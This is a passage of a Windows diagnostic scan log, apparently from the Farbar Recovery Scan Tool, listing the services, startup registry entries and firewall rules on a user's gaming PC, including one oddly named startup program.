MSCONFIG\Services: IPBusEnum => 3
MSCONFIG\Services: iphlpsvc => 2
MSCONFIG\Services: KeyIso => 3
MSCONFIG\Services: KtmRm => 3
MSCONFIG\Services: LanmanServer => 2
MSCONFIG\Services: LanmanWorkstation => 2
MSCONFIG\Services: lltdsvc => 3
MSCONFIG\Services: lmhosts => 2
MSCONFIG\Services: MBAMService => 2
MSCONFIG\Services: MMCSS => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: MSDTC => 3
MSCONFIG\Services: MSiSCSI => 3
MSCONFIG\Services: msiserver => 3
MSCONFIG\Services: napagent => 3
MSCONFIG\Services: Netlogon => 3
MSCONFIG\Services: Netman => 3
MSCONFIG\Services: netprofm => 3
MSCONFIG\Services: NlaSvc => 2
MSCONFIG\Services: nsi => 2
MSCONFIG\Services: NvContainerLocalSystem => 2
MSCONFIG\Services: NvContainerNetworkService => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NvTelemetryContainer => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: ose64 => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: p2psvc => 3
MSCONFIG\Services: PcaSvc => 2
MSCONFIG\Services: PeerDistSvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: Power => 2
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: QWAVE => 3
MSCONFIG\Services: RasAuto => 3
MSCONFIG\Services: RasMan => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: RemoteRegistry => 3
MSCONFIG\Services: RpcLocator => 3
MSCONFIG\Services: SamSs => 2
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: SDRSVC => 3
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: SDWSCService => 2
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SENS => 2
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: ShellHWDetection => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SNMPTRAP => 3
MSCONFIG\Services: Spooler => 2
MSCONFIG\Services: sppuinotify => 3
MSCONFIG\Services: SSDPSRV => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stisvc => 2
MSCONFIG\Services: swprv => 3
MSCONFIG\Services: SysMain => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: TapiSrv => 3
MSCONFIG\Services: TBS => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\Services: Themes => 2
MSCONFIG\Services: THREADORDER => 3
MSCONFIG\Services: TrkWks => 2
MSCONFIG\Services: TrustedInstaller => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: UI0Detect => 3
MSCONFIG\Services: UmRdpService => 3
MSCONFIG\Services: upnphost => 3
MSCONFIG\Services: UxSms => 2
MSCONFIG\Services: VaultSvc => 3
MSCONFIG\Services: vds => 3
MSCONFIG\Services: VSS => 3
MSCONFIG\Services: W32Time => 3
MSCONFIG\Services: WatAdminSvc => 3
MSCONFIG\Services: wbengine => 3
MSCONFIG\Services: WbioSrvc => 3
MSCONFIG\Services: wcncsvc => 3
MSCONFIG\Services: WcsPlugInService => 3
MSCONFIG\Services: WdiServiceHost => 3
MSCONFIG\Services: WdiSystemHost => 3
MSCONFIG\Services: WebClient => 3
MSCONFIG\Services: Wecsvc => 3
MSCONFIG\Services: wercplsupport => 3
MSCONFIG\Services: WerSvc => 3
MSCONFIG\Services: WinDefend => 3
MSCONFIG\Services: WinHttpAutoProxySvc => 3
MSCONFIG\Services: Winmgmt => 2
MSCONFIG\Services: WinRM => 3
MSCONFIG\Services: Wlansvc => 3
MSCONFIG\Services: wlidsvc => 2
MSCONFIG\Services: wmiApSrv => 3
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\Services: WPDBusEnum => 3
MSCONFIG\Services: WsAppService => 2
MSCONFIG\Services: wscsvc => 2
MSCONFIG\Services: WSearch => 2
MSCONFIG\Services: wuauserv => 2
MSCONFIG\Services: wudfsvc => 2
MSCONFIG\Services: WwanSvc => 3
MSCONFIG\startupreg: Actual Multiple Monitors => "C:\Program Files (x86)\Actual Multiple Monitors\ActualMultipleMonitorsCenter.exe"
MSCONFIG\startupreg: AudioSwitcher => "C:\Users\Martin\AppData\Local\Temp\Rar$EXa0.926\AudioSwitcher.exe"
MSCONFIG\startupreg: CloneCDTray => "C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe" /s
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DisplayFusion => "C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe"
MSCONFIG\startupreg: EVEMon => "C:\Program Files (x86)\EVEMon\EVEMon.exe" -startMinimized
MSCONFIG\startupreg: f.lux => "C:\Users\Martin\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
MSCONFIG\startupreg: HP ENVY 4520 series (NET) => "C:\Program Files\HP\HP ENVY 4520 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH5BO3M1CC0660:NW" -scfn "HP ENVY 4520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: MSC => "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
MSCONFIG\startupreg: ProfilerU => C:\Program Files\SmartTechnology\Software\ProfilerU.exe
MSCONFIG\startupreg: Razer Synapse => "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
MSCONFIG\startupreg: RTHDVCPL => "C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe" -s
MSCONFIG\startupreg: RUSH => C:\Program Files (x86)\Fnatic Gear\RUSH\RUSH_Core.exe
MSCONFIG\startupreg: SaiMfd => C:\Program Files\SmartTechnology\Software\SaiMfd.exe
MSCONFIG\startupreg: Salus => C:\Program Files (x86)\f552dd4c52e3\b786bdb3c67d.exe
MSCONFIG\startupreg: SDTray => "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"
MSCONFIG\startupreg: SpybotPostWindows10UpgradeReInstall => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\steam.exe" -silent
MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
MSCONFIG\startupreg: Vivaldi Update Notifier => "C:\Program Files\Vivaldi\Application\update_notifier.exe"
MSCONFIG\startupreg: XboxStat => "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{BCC7BE45-5ACA-4815-B066-515800CB6B4B}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{2E3E76CC-A240-4BC9-B75D-B21DA2449E27}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{4AFEF7FC-5364-4559-B298-316BF152B16B}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [UDP Query User{B9880637-F1BB-4C85-9925-0C3923E020A5}D:\spel\steam library\steamapps\common\magicka\magicka.exe] => (Allow) D:\spel\steam library\steamapps\common\magicka\magicka.exe
FirewallRules: [TCP Query User{CDDFC1AC-FBDD-43A7-9C65-2D0964B25B74}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{8D82C04F-BF9A-4701-B315-1F3B967766F3}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{627D9905-8B9E-47FF-A117-17E145D698DC}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{5DBF1606-7F85-4C2C-824E-EDFC11BD990D}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{FFDBE546-B8A5-49BE-90B7-42976EBA4237}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{E6FA73F3-7E35-4D33-9FE2-82ED8D6F4AFC}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{8D467693-5B77-4BE8-AE9C-0E9B563FFEAE}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{18C8350D-3057-4C5F-BAD2-725D1C1DECE7}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [TCP Query User{55EF3563-1C59-42E3-A4F0-9444A74C3E45}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{5C7C4B4A-69D3-483D-8A9C-DED0AC778BCD}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [{45C6EBB6-3B50-46EE-8980-667A09FCEBD8}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{828A5790-20F0-4956-BEB8-5409DF94B749}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{73B9B64C-3636-4CFD-A396-519632DF134D}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [{28448C4B-6FAC-45AB-AAF2-7B85D28E66AA}] => (Allow) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
FirewallRules: [TCP Query User{1EC0261B-37E5-4385-B272-9F7BEB055D4F}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [UDP Query User{759BC82D-B0DC-4F60-8BF7-9B7C657D9AD8}D:\spel\torchlight ii\torchlight2.exe] => (Allow) D:\spel\torchlight ii\torchlight2.exe
FirewallRules: [TCP Query User{0EF4E498-8DB1-439E-B6AA-EAB36450D94B}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [UDP Query User{D7B1A737-8140-4BF3-A072-18BB4055E961}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win32\udk.exe
FirewallRules: [TCP Query User{E900344C-C1D2-4B5A-8C5E-A2FA76B69DCF}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [UDP Query User{A5CC0085-DDB9-46E6-9D7F-C3D29ADFC80B}D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe] => (Allow) D:\spel\tribes ascend\hirezgames\tribes\binaries\win32\tribesascend.exe
FirewallRules: [{CE40884C-D69D-4465-979B-BA4B30B9422E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [{266CFBBD-8D67-4C75-979F-4A9A8AB47588}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Magicka\Magicka.exe
FirewallRules: [TCP Query User{DEF1856C-BB33-44D0-93E7-9412C14515BA}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [UDP Query User{54A34DA2-9A0B-4380-A28B-AB3B5CCF882F}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe
FirewallRules: [{61949EEE-5F62-40E1-80A6-E35482F3B71D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{0CDB1C6D-EC84-4F79-BE49-01DA29FC333D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 2\trine2_launcher.exe
FirewallRules: [{88C5EC1F-9F0C-4BC6-969B-98A5B600471E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{1C04E8C1-5BE1-41A4-A81D-744CA624EC02}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E5B4D7C5-07BE-4454-BF77-0EB6C80047D4}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{D4211A51-4CEC-4289-B7A1-430D4D240889}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{9B851F42-1FC8-41E4-8FEE-20948E6A2EE2}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{977CFC13-A7A2-4185-BC37-56982093CA7C}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Game.exe
FirewallRules: [{B9F172E7-6FA5-4EC8-A9CA-3F8595D0E566}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{9E83C0FE-4B23-463A-B83E-2EB3EAE5F80F}] => (Allow) D:\Spel\Rainbow Six Vegas 2\Binaries\R6Vegas2_Launcher.exe
FirewallRules: [{53E8919F-68FF-4BA8-8522-FA2F5301F9D2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{0461EBF1-7790-46AD-9455-39076D092A87}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{91EE7751-797C-4734-A64E-422748E809CF}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9147620D-AC70-4F7B-9DC6-14750D3EA729}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{6D2F2A72-BAF3-4580-ABD1-490BF2F2FD5C}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{35458669-7E78-4505-8146-C2DC82096E56}] => (Allow) D:\Spel\Battle for middle earth 2\game.dat
FirewallRules: [{6C0610D3-B27F-4795-BFE9-09046B8D93A4}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [{32B5C767-EA76-4FA6-8B6B-941A767CB7FF}] => (Allow) D:\Spel\Breach\Binaries\Win32\UDK.exe
FirewallRules: [TCP Query User{115CC196-11CD-4A9A-848A-6938D2300FEC}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [UDP Query User{31028D38-37E1-4AE1-A4D3-E17A7827C183}D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 2\trine2_32bit.exe
FirewallRules: [TCP Query User{D26D34ED-C6DC-4548-8E4A-F9B1D8C9F3D4}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [UDP Query User{3BF9E913-01AA-4CD6-9791-02D20E6E21B3}D:\spel\company of heroes\reliccoh.exe] => (Allow) D:\spel\company of heroes\reliccoh.exe
FirewallRules: [TCP Query User{D194207E-DDFD-4627-A0FC-BE2AEDBF6E7E}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [UDP Query User{F24EFC90-BBE5-41F9-9D0E-E8B90B1940EF}D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe] => (Allow) D:\spel\steam library\steamapps\common\chivalrymedievalwarfare\binaries\win64\udk.exe
FirewallRules: [{E543B941-B036-4E0B-8C3A-402A4504914E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{D6A8053A-49C3-49B7-8F59-73AEE955C61F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{FAC44A78-780D-426C-AF18-E1732DB54315}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{C6840C5F-EED4-40C0-B62C-09EA5DDF5C54}] => (Allow) D:\Spel\Battle.net\Battle.net.exe
FirewallRules: [{1AF22D79-FBE2-403D-8EB4-89EC28BFB2D2}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{D1C3AB65-7BCE-4E3F-B7E3-702CE1A76B6F}] => (Allow) D:\Spel\Hearthstone\Hearthstone.exe
FirewallRules: [{7C9C72EB-F655-4B26-80A3-872C50D6C853}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{CC7899A3-3B5F-4AA2-ADFB-0DFA2664FC0B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{F611C6D4-FBAC-498B-950F-DF8B93E825BB}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{C6B12067-A165-42B4-8493-1427A24499EF}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe
FirewallRules: [{352241C8-F360-47FD-BB61-A99048135DF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{1F00559E-8678-4CA4-80D8-F4828CDE89AA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{80DCBFFD-115F-4B87-8D59-93ACF03B341D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{3294C900-CB00-4E0F-BC69-4821E9831571}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{93986157-C87E-4AFE-96A8-FD7CD0ABD567}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{809F66C2-6701-4313-8B10-7B8BD900866B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{4FC1668A-CB01-4DD7-9DAE-C7F25A440247}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{1E88176E-755C-4681-BBD0-B30DC3F068D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Terraria\Terraria.exe
FirewallRules: [{79792EA2-C9DE-4298-926B-BC90F3195376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{84979D94-0AEB-46C3-969C-9B16766CB14C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{0842EC48-341B-4BE5-8806-F895B1A02DD5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [{5876B581-FA66-4BC7-8A00-35BF03AB8A02}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cortex Command\Cortex Command.exe
FirewallRules: [TCP Query User{F9D61A2D-DF6B-46D6-A53E-2E436D01180B}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [UDP Query User{70A3BEC4-CD11-4C95-83F5-225D9ED47A26}D:\spel\artemis\artemis.exe] => (Allow) D:\spel\artemis\artemis.exe
FirewallRules: [{1B617450-991D-493F-A0A4-83E61FCBBDE4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{92B52AA9-B01C-45B5-92CB-A8217B8519A5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\AwesomenautsLauncher.exe
FirewallRules: [{0966B62F-5434-423E-960F-43C13E70704B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{72CD6C0C-FB9C-4D1F-B641-7BC04AFBBE64}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{A8BDD7FA-BD06-4D31-9129-C0379C81A7DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{C5D12B7B-9A5B-4D13-A3D0-97737CF55F3B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\GunsOfIcarusOnline.exe
FirewallRules: [{6F611789-7AF0-4311-A413-5BD1E442E6F2}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{7EE7CEF0-CC26-421D-852B-A41EB04AAA74}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2737\Agent.exe
FirewallRules: [{F5C461FF-689E-4533-A67F-75367B56F40C}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [{E398CD22-4D44-47F8-9C19-9A06B908F24B}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.beta.2753\Agent.exe
FirewallRules: [TCP Query User{D6794F86-C0B5-4AEA-AB6B-FA39747E18C8}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [UDP Query User{A6FE6FA7-0813-4DCE-BEF2-5818F72B3519}D:\spel\angelsmu.com ex702 v9\main.exe] => (Allow) D:\spel\angelsmu.com ex702 v9\main.exe
FirewallRules: [{F489B2AD-61AC-4BD0-9F21-DD536D182F20}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [{2BE4269B-F03C-40EA-8C01-4EFE73ADD5A8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ.exe
FirewallRules: [TCP Query User{D4318ABC-EC68-4A88-830A-689E6DD21C84}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [UDP Query User{1456890F-4AA7-4A15-B12A-19A0BB3F99F7}D:\spel\the settlers 3 - ultimate collection\s3_multi.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3_multi.exe
FirewallRules: [TCP Query User{B581FB4E-4169-4D34-B684-8EB647EB97DD}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [UDP Query User{4F52FEA6-04DD-4CC9-BCD4-90E15D3600BB}C:\windows\syswow64\dplaysvr.exe] => (Allow) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{8CFF32A0-B686-4BDB-A678-E53ED8DD54BD}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [UDP Query User{63D32474-73BA-4E2C-BF1B-530850F77567}D:\spel\the settlers 3 - ultimate collection\s3.exe] => (Allow) D:\spel\the settlers 3 - ultimate collection\s3.exe
FirewallRules: [TCP Query User{5F8388FA-07B6-46FA-A85A-BDC61AEB2896}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [UDP Query User{EAE8ECFA-BA38-4F2A-B311-F74C7B6A09DD}D:\spel\warsow\warsow.exe] => (Allow) D:\spel\warsow\warsow.exe
FirewallRules: [TCP Query User{D04B26D3-05BF-4467-96C6-F5EFCEA9A568}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [UDP Query User{ECD07AB0-51C7-415D-8B98-F1A1FC702136}C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe] => (Allow) C:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
FirewallRules: [{814455B8-D927-4DF5-B1FE-25FFAB4E2FE7}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [{3FF9881D-DCDE-42EA-B1E9-4D0465089615}] => (Allow) D:\Spel\Heroes & Generals\live\hng.exe
FirewallRules: [TCP Query User{C02949D8-6746-4BCF-956E-4B55C69F0F0C}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [UDP Query User{70FBBFBB-B33D-4CC7-94F3-4A41468DFDC9}C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe] => (Allow) C:\users\martin\appdata\roaming\gameranger\gameranger\gameranger.exe
FirewallRules: [TCP Query User{D599766A-387D-4295-A977-8A7C4CD34D2F}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [UDP Query User{547CD1BA-D1F9-4CA9-B13D-B5840050F926}D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Block) D:\spel\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{DE6C67B3-404F-4E00-A294-F9A4AFC2C855}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [UDP Query User{A388931D-F8A0-43AF-A9EE-3F2F1AB0D802}D:\spel\resident evil 6\bh6.exe] => (Block) D:\spel\resident evil 6\bh6.exe
FirewallRules: [TCP Query User{AC075F6A-A440-4B5B-8C6E-20668B72EA5D}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [UDP Query User{47E95813-C968-481B-8401-A9F5423D9339}D:\spel\wolfenstein the new order\wolfneworder_x64.exe] => (Block) D:\spel\wolfenstein the new order\wolfneworder_x64.exe
FirewallRules: [TCP Query User{F88826EC-C4A7-4998-88F7-040A1DA49F26}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [UDP Query User{472ABE4E-8E97-428A-8634-C1F1221B2FC9}D:\spel\commandos 2\commandos 2\comm2.exe] => (Allow) D:\spel\commandos 2\commandos 2\comm2.exe
FirewallRules: [TCP Query User{A736D87A-8B4B-4C3F-A866-FC053951B367}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{4429C094-F675-4E39-8432-D6A974B313F6}C:\program files\java\jre6\bin\javaw.exe] => (Allow) C:\program files\java\jre6\bin\javaw.exe
FirewallRules: [{A31C0C9A-75B1-46E2-A560-D31AB2D27833}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [{AEB337AC-F838-4B4B-8816-B72BEED7EC99}] => (Allow) D:\Spel\Steam Library\SteamApps\common\mark_of_the_ninja\bin\game.exe
FirewallRules: [TCP Query User{24C29AC6-88E3-4A95-8C8F-45C5B9FE3A52}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [UDP Query User{2093AE12-66BF-4861-87C2-F3A96265073F}D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe] => (Allow) D:\spel\steam library\steamapps\common\awesomenauts\awesomenauts.exe
FirewallRules: [TCP Query User{79D77E57-3EE3-4C09-B530-4B3CE5BFAE9D}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [UDP Query User{9FBEF8B5-46DC-4444-A23C-6D11B088A8F3}D:\user profile\documents\octgn\octgn\octgn.exe] => (Allow) D:\user profile\documents\octgn\octgn\octgn.exe
FirewallRules: [TCP Query User{F66A678C-7B64-473D-8FC8-06201AADC062}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [UDP Query User{83CBDA9A-1575-490B-AB9F-D26497F68829}D:\spel\stronghold crusader extreme hd\stronghold crusader.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold crusader.exe
FirewallRules: [{84873599-EC78-4B38-A255-15EBC0FC2EA4}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
FirewallRules: [{4398A2A4-113B-4DC7-BEE3-C1A06EF2761E}] => (Allow) D:\Spel\Star Wars - Empire at War\Forces of Corruption\swfoc.exe
